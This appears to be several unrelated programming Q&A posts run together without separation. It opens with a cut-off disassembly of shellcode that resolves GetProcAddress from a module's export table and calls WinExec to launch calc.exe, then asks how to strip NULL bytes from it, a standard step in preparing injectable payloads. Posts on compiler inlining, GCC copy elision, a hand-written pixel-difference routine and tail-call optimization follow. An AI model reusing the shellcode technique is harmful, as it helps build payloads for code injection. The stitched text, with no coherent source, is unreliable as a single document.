00000000004000A2 B8 08 00 00 00 mov eax,8
00000000004000A7 48 6B C0 00 imul rax,rax,0
00000000004000AB 48 8B 4D 30 mov rcx,qword ptr [rbp+30h]
00000000004000AF 8B 84 01 88 00 00 00 mov eax,dword ptr [rcx+rax+88h]
00000000004000B6 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000BA 48 03 C8 add rcx,rax
00000000004000BD 48 8B C1 mov rax,rcx
00000000004000C0 48 89 45 38 mov qword ptr [rbp+38h],rax
00000000004000C4 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000C8 8B 40 1C mov eax,dword ptr [rax+1Ch]
00000000004000CB 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000CF 48 03 C8 add rcx,rax
00000000004000D2 48 8B C1 mov rax,rcx
00000000004000D5 48 89 45 40 mov qword ptr [rbp+40h],rax
00000000004000D9 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000DD 8B 40 20 mov eax,dword ptr [rax+20h]
00000000004000E0 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000E4 48 03 C8 add rcx,rax
00000000004000E7 48 8B C1 mov rax,rcx
00000000004000EA 48 89 45 48 mov qword ptr [rbp+48h],rax
00000000004000EE 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000F2 8B 40 24 mov eax,dword ptr [rax+24h]
00000000004000F5 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000F9 48 03 C8 add rcx,rax
00000000004000FC 48 8B C1 mov rax,rcx
00000000004000FF 48 89 45 50 mov qword ptr [rbp+50h],rax
0000000000400103 C7 45 58 00 00 00 00 mov dword ptr [rbp+58h],0
000000000040010A EB 08 jmp 0000000000400114
000000000040010C 8B 45 58 mov eax,dword ptr [rbp+58h]
000000000040010F FF C0 inc eax
0000000000400111 89 45 58 mov dword ptr [rbp+58h],eax
0000000000400114 48 8B 45 38 mov rax,qword ptr [rbp+38h]
0000000000400118 8B 40 18 mov eax,dword ptr [rax+18h]
000000000040011B 39 45 58 cmp dword ptr [rbp+58h],eax
000000000040011E 0F 83 AB 00 00 00 jae 00000000004001CF
0000000000400124 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400127 48 8B 4D 48 mov rcx,qword ptr [rbp+48h]
000000000040012B 8B 04 81 mov eax,dword ptr [rcx+rax*4]
000000000040012E 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
0000000000400132 48 BA 47 65 74 50 72 6F 63 41 mov rdx,41636F7250746547h
000000000040013C 48 39 14 01 cmp qword ptr [rcx+rax],rdx
0000000000400140 0F 85 84 00 00 00 jne 00000000004001CA
0000000000400146 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400149 48 8B 4D 50 mov rcx,qword ptr [rbp+50h]
000000000040014D 0F B7 04 41 movzx eax,word ptr [rcx+rax*2]
0000000000400151 48 8B 4D 40 mov rcx,qword ptr [rbp+40h]
0000000000400155 8B 04 81 mov eax,dword ptr [rcx+rax*4]
0000000000400158 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040015C 48 03 C8 add rcx,rax
000000000040015F 48 8B C1 mov rax,rcx
0000000000400162 48 89 45 60 mov qword ptr [rbp+60h],rax
0000000000400166 C6 45 68 57 mov byte ptr [rbp+68h],57h
000000000040016A C6 45 69 69 mov byte ptr [rbp+69h],69h
000000000040016E C6 45 6A 6E mov byte ptr [rbp+6Ah],6Eh
0000000000400172 C6 45 6B 45 mov byte ptr [rbp+6Bh],45h
0000000000400176 C6 45 6C 78 mov byte ptr [rbp+6Ch],78h
000000000040017A C6 45 6D 65 mov byte ptr [rbp+6Dh],65h
000000000040017E C6 45 6E 63 mov byte ptr [rbp+6Eh],63h
0000000000400182 C6 45 6F 00 mov byte ptr [rbp+6Fh],0
0000000000400186 48 8D 55 68 lea rdx,[rbp+68h]
000000000040018A 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040018E FF 55 60 call qword ptr [rbp+60h]
0000000000400191 48 89 45 70 mov qword ptr [rbp+70h],rax
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
00000000004001BC BA 05 00 00 00 mov edx,5
00000000004001C1 48 8D 4D 78 lea rcx,[rbp+78h]
00000000004001C5 FF 55 70 call qword ptr [rbp+70h]
00000000004001C8 EB 05 jmp 00000000004001CF
00000000004001CA E9 3D FF FF FF jmp 000000000040010C
00000000004001CF EB 05 jmp 00000000004001D6
00000000004001D1 E9 62 FE FF FF jmp 0000000000400038
00000000004001D6 48 8D A5 D0 00 00 00 lea rsp,[rbp+0D0h]
00000000004001DD 5D pop rbp
00000000004001DE C3 ret
Although I'm not sure how to handle a NULL-terminated string such as "calc.exe" which generates 4 NULL bytes:
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
Question
Is it possible to remove the NULL bytes by reshuffling the C code or maybe using compiler intrinsic tricks?
Consider the scenario where you have a complex procedure that have a state machine and is tracked with a state that never changes during a call to kernel, as in code illustrated below.
static inline void kernel(int recursion, int mode){
if(!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch(mode){
default return;
case 1: mode1(recursion-1);
case 2: mode2(recursion-1);
}
}
void mode1(int recursion){
kernel(recursion,1)
}
void mode2(int recursion){
kernel(recursion,2)
}
If only mode1 and mode2 functions are called elsewhere, can recent compilers eliminate the inner branches?
All functions are in the same compilation unit.
Came across this while implementing a interpreter for a subset of spirv byte code. The inner branch is for finding out how much to allocate, building up the AST, and doing the actual evaluation of expressions. The kernel takes care of traversing the tree, with all the switch on instruction OpCodes. Writing separate functions for each state will be even more difficult to maintain, since the kernel already takes up 1000+ loc, and moving up and down for the same traversal point and keeping them the same can be really difficult.
(I know modern c++ have constexpr if, but this is pure c code.)
Edit:
I've tried with msvc compiler with the following code:
uint32_t interp_code[]={1,2,1,1,2};
void mode1(const uint32_t* code, int recursion);
void mode2(const uint32_t* code, int recursion);
static INLINE void kernel(const uint32_t* code, int recursion, int mode)
{
if (!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch (*code) {
default: return;
case 1:
switch (mode) {
default: return;
case 1: mode1(code + 1, recursion - 1);
case 2: mode2(code + 1, recursion - 1);
}
case 2:
switch(mode) {
default: return;
case 1: mode2(code + 1, recursion - 1);
case 2: mode1(code + 1, recursion - 1);
}
}
}
void mode1(const uint32_t* code,int recursion)
{
kernel(code, recursion, 1);
}
void mode2(const uint32_t* code, int recursion)
{
kernel(code, recursion, 2);
}
int main()
{
mode1(interp_code, 5);
return 0;
}
Using inline in the INLINE place yielded a function call (O2 optimizations), and using __forceinline yields the two modes compiled separately with no function call.
Disassembly for inline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF65F8910C0 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF65F8910C4 85 D2 test edx,edx
00007FF65F8910C6 74 6C je mode1+74h (07FF65F891134h)
00007FF65F8910C8 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF65F8910CD 48 8D 59 04 lea rbx,[rcx+4]
00007FF65F8910D1 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF65F8910D6 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF65F8910DB 8D 7A FF lea edi,[rdx-1]
00007FF65F8910DE 66 90 xchg ax,ax
00007FF65F8910E0 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF65F8910E3 8B F7 mov esi,edi
00007FF65F8910E5 83 E9 01 sub ecx,1
00007FF65F8910E8 74 07 je mode1+31h (07FF65F8910F1h)
00007FF65F8910EA 83 F9 01 cmp ecx,1
00007FF65F8910ED 75 36 jne mode1+65h (07FF65F891125h)
00007FF65F8910EF EB 1A jmp mode1+4Bh (07FF65F89110Bh)
00007FF65F8910F1 8B D7 mov edx,edi
00007FF65F8910F3 48 8B CB mov rcx,rbx
00007FF65F8910F6 E8 C5 FF FF FF call mode1 (07FF65F8910C0h)
00007FF65F8910FB 41 B8 02 00 00 00 mov r8d,2
00007FF65F891101 8B D7 mov edx,edi
00007FF65F891103 48 8B CB mov rcx,rbx
00007FF65F891106 E8 F5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89110B 41 B8 02 00 00 00 mov r8d,2
00007FF65F891111 8B D7 mov edx,edi
00007FF65F891113 48 8B CB mov rcx,rbx
00007FF65F891116 E8 E5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89111B FF CF dec edi
00007FF65F89111D 48 83 C3 04 add rbx,4
00007FF65F891121 85 F6 test esi,esi
00007FF65F891123 75 BB jne mode1+20h (07FF65F8910E0h)
00007FF65F891125 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF65F89112A 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF65F89112F 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF65F891134 48 83 C4 28 add rsp,28h
00007FF65F891138 C3 ret
For __forceinline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF670271002 EC in al,dx
00007FF670271003 28 85 D2 74 60 48 sub byte ptr [rbp+486074D2h],al
33: kernel(code, recursion, 1);
00007FF670271009 89 5C 24 30 mov dword ptr [rsp+30h],ebx
00007FF67027100D 48 8D 59 04 lea rbx,[rcx+4]
00007FF670271011 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF670271016 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF67027101B 8D 7A FF lea edi,[rdx-1]
00007FF67027101E 66 90 xchg ax,ax
00007FF670271020 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF670271023 8B F7 mov esi,edi
00007FF670271025 83 E9 01 sub ecx,1
00007FF670271028 74 07 je mode1+31h (07FF670271031h)
00007FF67027102A 83 F9 01 cmp ecx,1
00007FF67027102D 75 2A jne mode1+59h (07FF670271059h)
00007FF67027102F EB 14 jmp mode1+45h (07FF670271045h)
00007FF670271031 8B D7 mov edx,edi
00007FF670271033 48 8B CB mov rcx,rbx
00007FF670271036 E8 C5 FF FF FF call mode1 (07FF670271000h)
00007FF67027103B 8B D7 mov edx,edi
00007FF67027103D 48 8B CB mov rcx,rbx
00007FF670271040 E8 2B 00 00 00 call mode2 (07FF670271070h)
00007FF670271045 8B D7 mov edx,edi
00007FF670271047 48 8B CB mov rcx,rbx
00007FF67027104A E8 21 00 00 00 call mode2 (07FF670271070h)
00007FF67027104F FF CF dec edi
00007FF670271051 48 83 C3 04 add rbx,4
00007FF670271055 85 F6 test esi,esi
00007FF670271057 75 C7 jne mode1+20h (07FF670271020h)
00007FF670271059 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF67027105E 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF670271063 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF670271068 48 83 C4 28 add rsp,28h
00007FF67027106C C3 ret
It seems with inline the compiler chose to inline the entirety of mode2 function body, and make kernel a separate function call. __forceinline forced the mode1 and mode2 to compile into two function bodies with the kernel. (This code doesn't break on the case, so fall through is expected)
Working with inline directive yields just the same code as nothing specified in INLINE in O2
I failed to find a flag that controls the named return value optimization for C language. For C++ it seems to be -fno-elide-constructors.
The source code implementing it is here but since it is a middle-end, no front end information is spoiled even in comments. The manual section did not exactly help either. However disassembling shows that as it is turned off on O0 and enabled on O1 it must be one of the following:
-fauto-inc-dec
-fcprop-registers
-fdce
-fdefer-pop
-fdelayed-branch
-fdse
-fguess-branch-probability
-fif-conversion2
-fif-conversion
-finline-small-functions
-fipa-pure-const
-fipa-reference
-fmerge-constants
-fsplit-wide-types
-ftree-builtin-call-dce
-ftree-ccp
-ftree-ch
-ftree-copyrename
-ftree-dce
-ftree-dominator-opts
-ftree-dse
-ftree-fre
-ftree-sra
-ftree-ter
-funit-at-a-time
C code:
struct p {
long x;
long y;
long z;
};
__attribute__((noinline))
struct p f(void) {
struct p copy;
copy.x = 1;
copy.y = 2;
copy.z = 3;
return copy;
}
int main(int argc, char** argv) {
volatile struct p inst = f();
return 0;
}
Compiled with O0 we see that the 'copy' structure is naively allocated on stack:
00000000004004b6 <f>:
4004b6: 55 push rbp
4004b7: 48 89 e5 mov rbp,rsp
4004ba: 48 89 7d d8 mov QWORD PTR [rbp-0x28],rdi
4004be: 48 c7 45 e0 01 00 00 mov QWORD PTR [rbp-0x20],0x1
4004c5: 00
4004c6: 48 c7 45 e8 02 00 00 mov QWORD PTR [rbp-0x18],0x2
4004cd: 00
4004ce: 48 c7 45 f0 03 00 00 mov QWORD PTR [rbp-0x10],0x3
4004d5: 00
4004d6: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004da: 48 8b 55 e0 mov rdx,QWORD PTR [rbp-0x20]
4004de: 48 89 10 mov QWORD PTR [rax],rdx
4004e1: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18]
4004e5: 48 89 50 08 mov QWORD PTR [rax+0x8],rdx
4004e9: 48 8b 55 f0 mov rdx,QWORD PTR [rbp-0x10]
4004ed: 48 89 50 10 mov QWORD PTR [rax+0x10],rdx
4004f1: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004f5: 5d pop rbp
4004f6: c3 ret
Compiled with O1 it is not allocated but a pointer is passed as an implicit argument
00000000004004b6 <f>:
4004b6: 48 89 f8 mov rax,rdi
4004b9: 48 c7 07 01 00 00 00 mov QWORD PTR [rdi],0x1
4004c0: 48 c7 47 08 02 00 00 mov QWORD PTR [rdi+0x8],0x2
4004c7: 00
4004c8: 48 c7 47 10 03 00 00 mov QWORD PTR [rdi+0x10],0x3
4004cf: 00
4004d0: c3 ret
The closest thing to that in GCC (i.e. a switch for copy elision) is -fcprop-registers. Copy elision doesn't exist in C, but this is the most similar feature to that. From the man page:
After register allocation and post-register allocation instruction
splitting, we perform a copy-propagation pass to try to reduce
scheduling dependencies and occasionally eliminate the copy.
Enabled at levels -O, -O2, -O3, -Os.
So I'm trying to optimize with pure assembly this C function that takes 2 images and outputs pixel by pixel its maximum difference in a grey scale:
unsigned short infNorm(unsigned char x1, unsigned char y1, unsigned char z1, unsigned char x2, unsigned char y2, unsigned char z2 ){
short x = abs(x1-x2);
short y = abs(y1-y2);
short z = abs(z1-z2);
if(x <= y){
return y > z ? y : z;
}else{
return x > z ? x : z;
}
}
void diff_c (unsigned char *src, unsigned char *src_2, unsigned char *dst, int m, int n, int src_row_size, int src_2_row_size, int dst_row_size) {
unsigned char (*src_matrix)[src_row_size] = (unsigned char (*)[src_row_size]) src;
unsigned char (*src_2_matrix)[src_2_row_size] = (unsigned char (*)[src_2_row_size]) src_2;
unsigned char (*dst_matrix)[dst_row_size] = (unsigned char (*)[dst_row_size]) dst;
unsigned char n1;
for(int y = 0; y < n; y++){
for(int x = 0; x < m; ++x ){
n1 = infNorm(src_matrix[y][x*4], src_matrix[y][x*4+1], src_matrix[y][x*4+2],
src_2_matrix[y][x*4], src_2_matrix[y][x*4+1], src_2_matrix[y][x*4+2]);
dst_matrix[y][x*4] = n1; //blue
dst_matrix[y][x*4+1] = n1; //red
dst_matrix[y][x*4+2] = n1; //green
dst_matrix[y][x*4+3] = 255; //alpha
}
}
}
I did this using SIMD and got a function that is much more faster than any output from gcc on any optimization flag. Now, I wanted to do the same but without using any SSE instruction. For this I objdumped gcc's build and isolated the part that does this two functions (gcc -O3) to kind of have an I dea of what was gcc doing:
0000000000402280 <infNorm>:
402280: 40 0f b6 ff movzx edi,dil
402284: 0f b6 c9 movzx ecx,cl
402287: 40 0f b6 f6 movzx esi,sil
40228b: 29 cf sub edi,ecx
40228d: 45 0f b6 c0 movzx r8d,r8b
402291: 0f b6 d2 movzx edx,dl
402294: 89 f8 mov eax,edi
402296: 44 29 c6 sub esi,r8d
402299: 45 0f b6 c9 movzx r9d,r9b
40229d: c1 f8 1f sar eax,0x1f
4022a0: 44 29 ca sub edx,r9d
4022a3: 31 c7 xor edi,eax
4022a5: 29 c7 sub edi,eax
4022a7: 89 f0 mov eax,esi
4022a9: c1 f8 1f sar eax,0x1f
4022ac: 31 c6 xor esi,eax
4022ae: 29 c6 sub esi,eax
4022b0: 89 d0 mov eax,edx
4022b2: c1 f8 1f sar eax,0x1f
4022b5: 31 c2 xor edx,eax
4022b7: 29 c2 sub edx,eax
4022b9: 66 39 f7 cmp di,si
4022bc: 7e 12 jle 4022d0 <infNorm+0x50>
4022be: 66 39 d7 cmp di,dx
4022c1: 89 d0 mov eax,edx
4022c3: 0f 4d c7 cmovge eax,edi
4022c6: c3 ret
4022c7: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0]
4022ce: 00 00
4022d0: 66 39 d6 cmp si,dx
4022d3: 89 d0 mov eax,edx
4022d5: 0f 4d c6 cmovge eax,esi
4022d8: c3 ret
4022d9: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
00000000004022e0 <diff_c>:
4022e0: 45 85 c0 test r8d,r8d
4022e3: 0f 8e 05 01 00 00 jle 4023ee <diff_c+0x10e>
4022e9: 41 57 push r15
4022eb: 45 31 ff xor r15d,r15d
4022ee: 41 56 push r14
4022f0: 44 8d 34 8d 00 00 00 lea r14d,[rcx*4+0x0]
4022f7: 00
4022f8: 41 55 push r13
4022fa: 41 54 push r12
4022fc: 49 89 f4 mov r12,rsi
4022ff: 55 push rbp
402300: 48 89 fd mov rbp,rdi
402303: 53 push rbx
402304: 48 63 44 24 38 movsxd rax,DWORD PTR [rsp+0x38]
402309: 48 89 44 24 e8 mov QWORD PTR [rsp-0x18],rax
40230e: 49 63 c1 movsxd rax,r9d
402311: 48 89 44 24 f8 mov QWORD PTR [rsp-0x8],rax
402316: 48 63 44 24 40 movsxd rax,DWORD PTR [rsp+0x40]
40231b: 48 89 44 24 f0 mov QWORD PTR [rsp-0x10],rax
402320: 85 c9 test ecx,ecx
402322: 0f 8e a0 00 00 00 jle 4023c8 <diff_c+0xe8>
402328: 31 c0 xor eax,eax
40232a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
402330: 48 63 d8 movsxd rbx,eax
402333: 44 8d 58 01 lea r11d,[rax+0x1]
402337: 44 8d 50 02 lea r10d,[rax+0x2]
40233b: 41 0f b6 34 1c movzx esi,BYTE PTR [r12+rbx*1]
402340: 44 0f b6 4c 1d 00 movzx r9d,BYTE PTR [rbp+rbx*1+0x0]
402346: 4d 63 db movsxd r11,r11d
402349: 4d 63 d2 movsxd r10,r10d
40234c: 42 0f b6 7c 1d 00 movzx edi,BYTE PTR [rbp+r11*1+0x0]
402352: 47 0f b6 2c 14 movzx r13d,BYTE PTR [r12+r10*1]
402357: 41 29 f1 sub r9d,esi
40235a: 44 89 ce mov esi,r9d
40235d: c1 fe 1f sar esi,0x1f
402360: 41 31 f1 xor r9d,esi
402363: 41 29 f1 sub r9d,esi
402366: 43 0f b6 34 1c movzx esi,BYTE PTR [r12+r11*1]
40236b: 29 f7 sub edi,esi
40236d: 89 fe mov esi,edi
40236f: c1 fe 1f sar esi,0x1f
402372: 31 f7 xor edi,esi
402374: 29 f7 sub edi,esi
402376: 42 0f b6 74 15 00 movzx esi,BYTE PTR [rbp+r10*1+0x0]
40237c: 44 29 ee sub esi,r13d
40237f: 41 89 f5 mov r13d,esi
402382: 41 c1 fd 1f sar r13d,0x1f
402386: 44 31 ee xor esi,r13d
402389: 44 29 ee sub esi,r13d
40238c: 41 89 fd mov r13d,edi
40238f: 66 39 fe cmp si,di
402392: 44 0f 4d ee cmovge r13d,esi
402396: 66 44 39 ce cmp si,r9w
40239a: 41 0f 4c f1 cmovl esi,r9d
40239e: 66 41 39 f9 cmp r9w,di
4023a2: 41 0f 4e f5 cmovle esi,r13d
4023a6: 40 88 34 1a mov BYTE PTR [rdx+rbx*1],sil
4023aa: 42 88 34 1a mov BYTE PTR [rdx+r11*1],sil
4023ae: 42 88 34 12 mov BYTE PTR [rdx+r10*1],sil
4023b2: 8d 70 03 lea esi,[rax+0x3]
4023b5: 83 c0 04 add eax,0x4
4023b8: 44 39 f0 cmp eax,r14d
4023bb: 48 63 f6 movsxd rsi,esi
4023be: c6 04 32 ff mov BYTE PTR [rdx+rsi*1],0xff
4023c2: 0f 85 68 ff ff ff jne 402330 <diff_c+0x50>
4023c8: 41 83 c7 01 add r15d,0x1
4023cc: 4c 03 64 24 e8 add r12,QWORD PTR [rsp-0x18]
4023d1: 48 03 6c 24 f8 add rbp,QWORD PTR [rsp-0x8]
4023d6: 48 03 54 24 f0 add rdx,QWORD PTR [rsp-0x10]
4023db: 45 39 c7 cmp r15d,r8d
4023de: 0f 85 3c ff ff ff jne 402320 <diff_c+0x40>
4023e4: 5b pop rbx
4023e5: 5d pop rbp
4023e6: 41 5c pop r12
4023e8: 41 5d pop r13
4023ea: 41 5e pop r14
4023ec: 41 5f pop r15
4023ee: f3 c3 repz ret
So with this in mind, the idea counter to what gcc was doing, was to avoid access to memory as much as possible and using something similar to gcc's I unrolled the loop one time more and wrote this:
diff_asm:
push rbp
push r12
push r13
push r14
push r15
push rbx
sub rsp, 8
mov r15, rdx
mov eax, r8d
mov ecx, ecx
mul rcx
mov rcx, rax
mov rdx, r15
.cicle:
cmp rcx, 0
je .tend
mov rbx, [rdi + rcx*4 - 8]
movzx r12, bl
shr rbx, 8
movzx r13, bl
shr rbx, 8
movzx r14, bl
shr rbx, 16
mov r15, [rsi + rcx*4 - 8]
movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 16
call inf_norm
movzx r12, bl
shr rbx, 8
movzx r13, bl
shr rbx, 8
movzx r14, bl
shr rbx, 8
movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 8
call inf_norm
mov [rdx + rcx*4 - 8], rax
sub rcx, 2
jmp .cicle
.tend:
add rsp, 8
pop rbx
pop r15
pop r14
pop r13
pop r12
pop rbp
ret
; r12w = x_1
; r13w = y_1
; r14w = z_1
; rbp = x_2
; r8 = y_2
; r9 = z_3
inf_norm:
sub r12d, ebp
mov ebp, r12d
sar ebp, 0x1f
xor r12d, ebp
sub r12d, ebp
sub r13d, r8d
mov r8d, r13d
sar r8d, 0x1f
xor r13d, r8d
sub r13d, r8d
sub r14d, r9d
mov r9d, r14d
sar r9d, 0x1f
xor r14d, r9d
sub r14d, r9d
cmp r12w, r13w
jg .z_y
cmp r13w, r14w
cmovl r13d, r14d
jmp .insert
.z_y:
cmp r12w, r14w
mov r13d, r14d
cmovge r13d, r12d
.insert:
mov al, r13b
ror rax, 8
mov al, r13b
ror rax, 8
mov al, r13b
ror rax, 8
mov al, 255
ror rax, 8
ret
So now I get that my hand-made assembler routine is in some cases almost two times more slower than gcc -O3/-O2 but for the life of my I don't get why. Are the calls affecting the performance? or are the rotations? Wrote an implementation using shifts instead of rotates but it was a bit more slower than this one. Any help would be appreciated.
I have tried the following code on gcc 4.4.5 on Linux and gcc-llvm on Mac OSX(Xcode 4.2.1) and this. The below are the source and the generated disassembly of the relevant functions. (Added: compiled with gcc -O2 main.c)
#include <stdio.h>
__attribute__((noinline))
static void g(long num)
{
long m, n;
printf("%p %ld\n", &m, n);
return g(num-1);
}
__attribute__((noinline))
static void h(long num)
{
long m, n;
printf("%ld %ld\n", m, n);
return h(num-1);
}
__attribute__((noinline))
static void f(long * num)
{
scanf("%ld", num);
g(*num);
h(*num);
return f(num);
}
int main(void)
{
printf("int:%lu long:%lu unsigned:%lu\n", sizeof(int), sizeof(long), sizeof(unsigned));
long num;
f(&num);
return 0;
}
08048430 <g>:
8048430: 55 push %ebp
8048431: 89 e5 mov %esp,%ebp
8048433: 53 push %ebx
8048434: 89 c3 mov %eax,%ebx
8048436: 83 ec 24 sub $0x24,%esp
8048439: 8d 45 f4 lea -0xc(%ebp),%eax
804843c: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
8048443: 00
8048444: 89 44 24 04 mov %eax,0x4(%esp)
8048448: c7 04 24 d0 85 04 08 movl $0x80485d0,(%esp)
804844f: e8 f0 fe ff ff call 8048344 <printf#plt>
8048454: 8d 43 ff lea -0x1(%ebx),%eax
8048457: e8 d4 ff ff ff call 8048430 <g>
804845c: 83 c4 24 add $0x24,%esp
804845f: 5b pop %ebx
8048460: 5d pop %ebp
8048461: c3 ret
8048462: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
8048469: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
08048470 <h>:
8048470: 55 push %ebp
8048471: 89 e5 mov %esp,%ebp
8048473: 83 ec 18 sub $0x18,%esp
8048476: 66 90 xchg %ax,%ax
8048478: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp)
804847f: 00
8048480: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp)
8048487: 00
8048488: c7 04 24 d8 85 04 08 movl $0x80485d8,(%esp)
804848f: e8 b0 fe ff ff call 8048344 <printf#plt>
8048494: eb e2 jmp 8048478 <h+0x8>
8048496: 8d 76 00 lea 0x0(%esi),%esi
8048499: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi
080484a0 <f>:
80484a0: 55 push %ebp
80484a1: 89 e5 mov %esp,%ebp
80484a3: 53 push %ebx
80484a4: 89 c3 mov %eax,%ebx
80484a6: 83 ec 14 sub $0x14,%esp
80484a9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
80484b0: 89 5c 24 04 mov %ebx,0x4(%esp)
80484b4: c7 04 24 e1 85 04 08 movl $0x80485e1,(%esp)
80484bb: e8 94 fe ff ff call 8048354 <__isoc99_scanf#plt>
80484c0: 8b 03 mov (%ebx),%eax
80484c2: e8 69 ff ff ff call 8048430 <g>
80484c7: 8b 03 mov (%ebx),%eax
80484c9: e8 a2 ff ff ff call 8048470 <h>
80484ce: eb e0 jmp 80484b0 <f+0x10>
We can see that g() and h() are mostly identical except the & (address of) operator beside the argument m of printf()(and the irrelevant %ld and %p).
However, h() is tail-call optimized and g() is not. Why?
In g(), you're taking the address of a local variable and passing it to a function. A "sufficiently smart compiler" should realize that printf does not store that pointer. Instead, gcc and llvm assume that printf might store the pointer somewhere, so the call frame containing m might need to be "live" further down in the recursion. Therefore, no TCO.
It's the & that does it. It tells the compiler that m should be stored on the stack. Even though it is passed to printf, the compiler has to assume that it might be accessed by somebody else and thus must the cleaned from the stack after the call to g.
In this particular case, as printf is known by the compiler (and it knows that it does not save pointers), it could probably be taught to perform this optimization.
For more info on this, look up 'escape anlysis'.